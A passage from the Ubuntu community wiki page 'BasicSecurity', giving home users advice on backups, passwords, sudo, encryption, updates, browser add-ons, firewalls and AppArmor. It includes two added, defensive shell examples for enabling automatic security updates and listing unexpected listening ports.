  • Reality: Ubuntu CAN be compromised by Windows malware if you're using Wine. This is not to say that Windows malware can infect a Linux system directly; however, if targeted properly, it CAN use the Wine interpreter to send system calls to the Linux kernel. This is a very rare case, and it is highly unlikely to occur as it would be a very targeted attack. But for completeness' sake we should mention that it CAN happen.

  • Myth: Ubuntu is harder to exploit than Windows, Mac OSX, whatever else - and it's targeted less than those other operating systems as well.

  • Reality: The process of discovering a vulnerability and exploiting it is pretty much the same across the board, regardless of operating system.

These are just some common myths associated with Ubuntu and security. This list is not comprehensive, but it covers the largest misconceptions held by new users. This does not mean that Ubuntu is inherently insecure, or is less secure than previous versions, or is more/less secure than any other operating system. It is just an effort to dispel common myths and get the reader (you) thinking in a positive direction toward improving their system's security posture. If you follow the steps in this Wiki, you will have a decent defense built to protect your machine from viruses as well as the other more pressing threats out there.

And of course, we'd be remiss not to mention social engineering. What information are you putting into public view? Do you know who you're giving valuable information to? Social engineering is important to understand but beyond the scope of this Wiki.

Backups

Reinstalling an operating system again after it corrupts is annoying. But losing valuable personal pictures, letters, emails... these are priceless and cannot be replaced. If you are prepared to wipe and reinstall with very little notice, then you are far more secure. Moreover, there are many threads in the Ubuntu Forums that describe problems that would have been avoided if the user had made good backups. It is important to make special backups before certain risky operations like upgrading to a new version, operations on partitions and partition tables, using dd, etc. Finally, if you're concerned that your computer has been infected or "cracked," then you can restore Ubuntu to a known previously good state.

To quote the introduction of Duplicity Backup, "There are many different applications that are available to backup Ubuntu. Each one has its strengths and weaknesses. Some are made for enterprise environments where it is necessary to back up many computers quickly and efficiently. Others are made for home environments and come with a simple wizard-driven GUI or command line interface...Each application can backup to one or many DVDs, CDs, disk drives, and other media or may not backup to one or more of those things. As varied as these programs are, so are the needs of the individuals who use them." This link can help you decide where to backup your data, what to backup, and when.

It All Starts With a Good Password

Obviously if an attacker doesn't have your password, then it's harder for him to make changes on your machine. A strong unique password for each account is best; consider using a password safe (but remember that the safe's own password MUST be a good one!). Read this discussion regarding the process of choosing a good password.

Know What Sudo is Doing

If you're following a set of instructions and you're about to type in sudo, ask yourself "Do I REALLY know what this command is about to do?" If you can't explain it to your grandmother, then you don't know what's going to happen. Related to that: if you get asked for your password, make sure you know what you've just done to trigger that response. The system is trying to protect you. Here is an explanation of sudo.

Don't Log in as Root

An excellent way to find yourself in deep trouble is to modify permissions as root. Logging in as root means you will be browsing the Internet as root: drive-by downloads (downloads that you did not authorize, or that you authorized without realizing the consequences) and malicious scripts can all now execute with root permission. Default settings in Ubuntu will not allow you to log in as root.

Encrypt Your Home Folder

Encrypting the home folder will help for physical security. If someone is able to sit down in front of your computer or if they steal it, they won't be able to see the files in your home folder. In Ubuntu when you encrypt the home folder, the folder mounts when you log in which makes it readable to anyone sitting in front of your computer. Once you log out, the home folder unmounts and is encrypted again. Encrypting the home folder will do nothing to protect you from on-line threats. As long as the encrypted folder is mounted, it will be plain text for anyone with access.

You can encrypt your home folder or the entire hard drive on first install. Alternatively you can click here and here to learn how to add encryption to your home folder after installation. You could even just encrypt a particular file, a sub-directory, a usb stick... the choices are endless.

There are risks with encryption, so carefully evaluate your personal situation to determine if it is right for you. If you lose the password then your chances of recovering the data drop to almost nil. You should also keep in mind that if you encrypt your home folder or hard drive and your system fails later on, it will be harder to recover your files. You will have to consider the value of the data you store on your computer to determine if encryption is worth the risk. For instance, if you insist on saving a detailed list of all your financial accounts in a text file, then encryption is vital. But if you don't store anything of personal value on the hard drive, then encryption may be less necessary.

Least Privileges, Always

Always make sure you are using the least amount of privileges/permissions to do the task necessary. Use only what you need, nothing more. If you are surfing the net and come across a "drive-by download" site, then what the malicious program has access to changes dramatically if it has lowered privileges. Learn how to use file permissions and non-privileged users (which Ubuntu makes very easy). Here is a link to everything you need to know about file permissions. Also consider enabling guest accounts if you will have other people using your computer.

Security Updates

Security updates are released by Ubuntu developers when they discover and patch vulnerabilities. If you don't install the updates then you retain the vulnerability. Ubuntu allows you to have security updates automatically installed - once configured you don't need to run security updates manually again. Search for the Update Manager on your desktop and click on "settings" to configure how you want Ubuntu to manage updates. Or you can configure automatic updates via terminal.
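As an added example (not part of this wiki page), the terminal route to automatic security updates: the two APT configuration files that the unattended-upgrades package reads, written here to a temporary directory so the script runs without root, plus a small check you can re-run on a machine later. The directory variable and the check function are this example's own names.

```shell
# Added example, not from the wiki page: the two APT files that switch on
# unattended security updates on Ubuntu. They are written to a scratch
# directory so this runs without root; on a real system the directory is
# /etc/apt/apt.conf.d/ (which needs sudo) and the package that reads them
# is installed with:  sudo apt-get install unattended-upgrades
APT_CONF_DIR="${APT_CONF_DIR:-$(mktemp -d)}"

write_auto_upgrade_conf() {
    # 20auto-upgrades: refresh the package lists and run the unattended
    # upgrader once a day.
    cat > "$1/20auto-upgrades" <<'EOF'
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
EOF
    # 50unattended-upgrades: take packages only from the -security pocket,
    # so ordinary feature updates still wait for you to review them.
    cat > "$1/50unattended-upgrades" <<'EOF'
Unattended-Upgrade::Allowed-Origins {
    "${distro_id}:${distro_codename}-security";
};
Unattended-Upgrade::Remove-Unused-Dependencies "true";
EOF
}

# Succeeds (exit 0) only when both daily knobs are set to "1" in the
# 20auto-upgrades file of the given directory; use it to re-check a
# machine after an upgrade or a reinstall.
auto_updates_enabled() {
    grep -q '^APT::Periodic::Update-Package-Lists "1";' "$1/20auto-upgrades" 2>/dev/null &&
        grep -q '^APT::Periodic::Unattended-Upgrade "1";' "$1/20auto-upgrades" 2>/dev/null
}

write_auto_upgrade_conf "$APT_CONF_DIR"
if auto_updates_enabled "$APT_CONF_DIR"; then
    echo "automatic security updates: enabled (files in $APT_CONF_DIR)"
else
    echo "automatic security updates: NOT enabled"
fi
```

Point APT_CONF_DIR at /etc/apt/apt.conf.d and run the write function with sudo to apply it for real; the check function works unchanged against the live directory.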

Know What You Have, Have What You Know

Don't run services you don't need. Do you really need a VOIP phone system? What about Secure Shell (SSH), Virtual Network Computing (VNC), Apache server? If you need a service, make sure you understand it and can properly secure it. You can't secure what you don't understand.

Make Your Browser More Secure

The majority of threats to your machine come from your browser, even when you use common sense. You have absolutely no control over vulnerabilities on someone else's web page as an end user, so it's important to defend yourself against any malicious activity originating from a compromised web page. If you are interested in learning how browser exploits happen, you can read this summary of the top ten vulnerabilities in a poorly designed web page.

Secure your browser. We will discuss Firefox because that's the browser packaged in Ubuntu. However, other browsers have similar features. We recommend that you use the following services. As mentioned before, these measures may inhibit functionality until you manually configure them. Again you must weigh the need for security against the need for functionality as it relates to your personal situation.

Preferences

Find Preferences in the menu bar of Firefox. Under the privacy tab you can tell web sites you don't want to be tracked and you can choose to never remember history. Using exceptions, you can whitelist sites for specific needs; allow them for the session at most, and clear history when closing the browser. Choose "never remember history" so that if someone hijacks your browser session, they won't find any valuable stored data. Don't use "hardware acceleration".

NoScript

If you unknowingly visit a compromised website, this will prevent scripts (i.e. programs) from running on your system. It can be a tricky tool to use at first glance as it blocks all scripts from running at first. If you spend a little time getting familiar with NoScript, you will find it easier to use. As a user, you tell NoScript what sites to partially or fully trust. Don't "allow all scripts globally" under any circumstances!

Configuring NoScript is notoriously daunting to the new user. A helpful guide to configure NoScript is included on a separate page, https://wiki.ubuntu.com/BasicSecurity/NoScript.

AdBlockPlus

You can tell by the name that it (surprise!) blocks annoying ads, but it can also block those ads from collecting personal information about you. Adblock Plus provides a default list of blocked ads. Additionally, you can block any individual ads or scripts that show up by adding them manually.

BetterPrivacy

The add-on BetterPrivacy will prevent websites from installing “super cookies” on your computer designed to track your history for marketing research.

ClickClean

ClickClean is a simple tool to delete your browsing history, erase all temporary internet files, and remove downloaded files history, cookies, Flash LSOs and typed URLs. It allows for automatic deletion of private data when Firefox closes. Basically, if your browser session is ever hijacked, the hijacker will get little valuable information.

The importance of securing your browser cannot be overstated. We've listed some of the simple tools you can implement to drastically improve your security. There are numerous others aimed at security as well as privacy; we encourage you to research those.

Home Network

Most computer users at home have a local network...often without even realising it. We encourage you to learn more about securing your home network; again, you can't secure what you don't understand. The CERT Guide to Home Network Security provides an excellent overview of the basic principles of networking and the internet. Learn some of the fundamentals about securing your router. For instance, if you use wireless access, make sure you're using STRONG encryption: not WEP but WPA/WPA2. Use a GOOD password consisting of all 63 characters; you only have to type it once anyway.

Devices plugged into your network can be accessed by unauthorized users just as easily as your computer can. Learn about making a networked printer more secure.

Repeating All of the Above on Each System

Be consistent: if you do these things with your desktop Ubuntu system, you will find it is actually pretty secure. If you have two computers running Ubuntu, then repeat this process on both computers. If you've got one computer partitioned, then secure all partitions. Now apply this to the other devices on your network. This includes any other computers, cell phones, routers, printers, game consoles, whatever. Your network's security is only as strong as the weakest link.


Security Tools You Have to Regularly & Actively Engage

So that was the "easy" stuff. True security is an ongoing process, and a lot of the really good security tools require regular interaction from you. The next tools we describe are more advanced because you cannot "set and forget" them. They also require more effort to setup and use effectively, but the effort is worth it. The more security measures you implement from this Wiki, the more secure you will be.

Firewall

There is a lot of existing information about firewalls, along with a long-term raging debate on the need for a firewall on Ubuntu. We recommend you enable it because you have ports open if you are reading this page. Traffic can go in and out of that port unhindered without a firewall. Malicious programs can open arbitrary ports unless you have a firewall to prevent that. A NAT router can add a layer of protection, but it is not a substitute for a firewall. This additional guide will provide more information.

Use your firewall PROPERLY. Don't set it and forget it; learn how it works and set decent rules. Here is a tutorial showing how to enable a firewall in Ubuntu. However, adding port numbers can feel confusing. If it helps, think of it this way: currently you're reading this guide because you accessed a webpage hosted by wiki.ubuntu.com. To make the connection (and therefore to see the content), your browser has to connect to that website on Port 80. Another example is when you pick up your email: your computer makes a connection to your mail server on Port 110. The other port numbers that you add provide similar functions.
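An added example, not from the wiki, that serves both this section and "Know What You Have, Have What You Know" above: it lists the TCP ports a machine is listening on that are not on your short list of known services, which is exactly the set you either shut down or write a deliberate firewall rule for. The socket table below is constructed, and the allow-list ports (22 for SSH, 631 for CUPS) are assumptions chosen for illustration.

```shell
# Added example, not from the wiki page: print the listening TCP ports
# that are NOT in the allow-list of services you know you need. Every
# port it prints is either a service to turn off or one that needs its
# own firewall rule. On a live Ubuntu system feed it the real table:
#     ss -ltn | unexpected_listeners "22 631"
# (older systems: netstat -ltn). The sample below is constructed.

# $1 is a space-separated allow-list of ports; "ss -ltn" output on stdin.
unexpected_listeners() {
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        # Only LISTEN rows count; the 4th column is Local Address:Port,
        # e.g. 0.0.0.0:22, 127.0.0.1:631 or [::]:5900 (IPv6).
        $1 == "LISTEN" {
            port = $4
            sub(/.*:/, "", port)      # keep only what follows the last colon
            if (!(port in ok)) print port
        }
    ' | sort -un
}

# Constructed "ss -ltn" output: SSH (22) and the local CUPS printer
# service (631) are expected; VNC (5900) and a forgotten test web
# server on 8080 are not.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      128    [::]:22             [::]:*
LISTEN 0      5      127.0.0.1:631       0.0.0.0:*
LISTEN 0      50     0.0.0.0:5900        0.0.0.0:*
LISTEN 0      100    *:8080              *:*'

echo "listening ports not on the allow-list (22 631):"
printf '%s\n' "$SAMPLE_SS" | unexpected_listeners "22 631"
# prints 5900 and 8080, one per line
```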

AppArmor

AppArmor can strengthen your security. To quote the Novell site, "AppArmor is designed to provide easy-to-use application security for both servers and workstations. Novell AppArmor is an access control system that lets you specify per program which files the program may read, write, and execute. AppArmor secures applications by enforcing good application behavior without relying on attack signatures, so it can prevent attacks even if they are exploiting previously unknown vulnerabilities." AppArmor has a pretty steep learning curve for new users. However, once you master it, creating profiles for most applications is fairly simple. It only gets tricky when you deal with applications that have to change functions a lot (for instance, Apache). Here is a tutorial on AppArmor.


Did I Just Get Owned?

For a helpful guide created by Dangertux which can help you determine if you have been compromised, see this page:
https://wiki.ubuntu.com/BasicSecurity/DidIJustGetOwned


Acknowledgements

This Wiki was birthed on the Ubuntu Forums by MrLeek and Ms. Daisy. Contributions came from Dangertux, OpSecShellShock, haqking, Thewhistlingwind, dFlyer, vasa1, Olle Wiklund, CharlesA and a Mystery Guy ;)

BasicSecurity (last edited 2012-12-28 10:50:07 by host86-182-68-148)